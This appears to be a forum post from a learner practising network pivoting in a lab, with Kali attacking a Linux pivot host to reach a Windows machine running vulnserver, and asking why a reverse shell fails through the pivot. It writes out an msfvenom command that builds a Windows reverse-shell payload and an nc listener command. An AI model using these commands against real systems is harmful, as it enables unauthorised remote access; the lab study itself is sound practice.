Basically, I’m learning how to pivot with the following setup, need some helping hand.
Kali (attack machine)-> Linux (pivot machine) -> Windows (target machine)
To start with, exploited Linux and created a meterpreter session with root privileges, then used autoroute from the Meterpreter session wich confirms the open ports on windows.
I have got vulnserver on Windows for buffer overflow. Proxy server socks4a has been set up so the windows machine is taking commands via proxychains (nmap and psexec etc) from kali. From here, what I’m trying to do is execute a shellcode for the Windows machine via proxychains and catch the reverse shell back on my Kali machine. I have already tested the shellcode with direct access kali -> windows and the exploit is all working and getting shell with nc -nlvp 4443 from kali.
But it is not working via a pivot machine. I used Msfvenom as a payload with the following LOST and LPORT IP’s.
msfvenom -p windows/shell_reverse_tcp LHOST=<Linux-pivot-IP> LPORT=4443 -b ‘<retn-variable>’ EXITFUNC=thread -f python -v payload
Running nc -nlvp 4443 on kali is not getting me reverse shell from windows. Have I missed anything?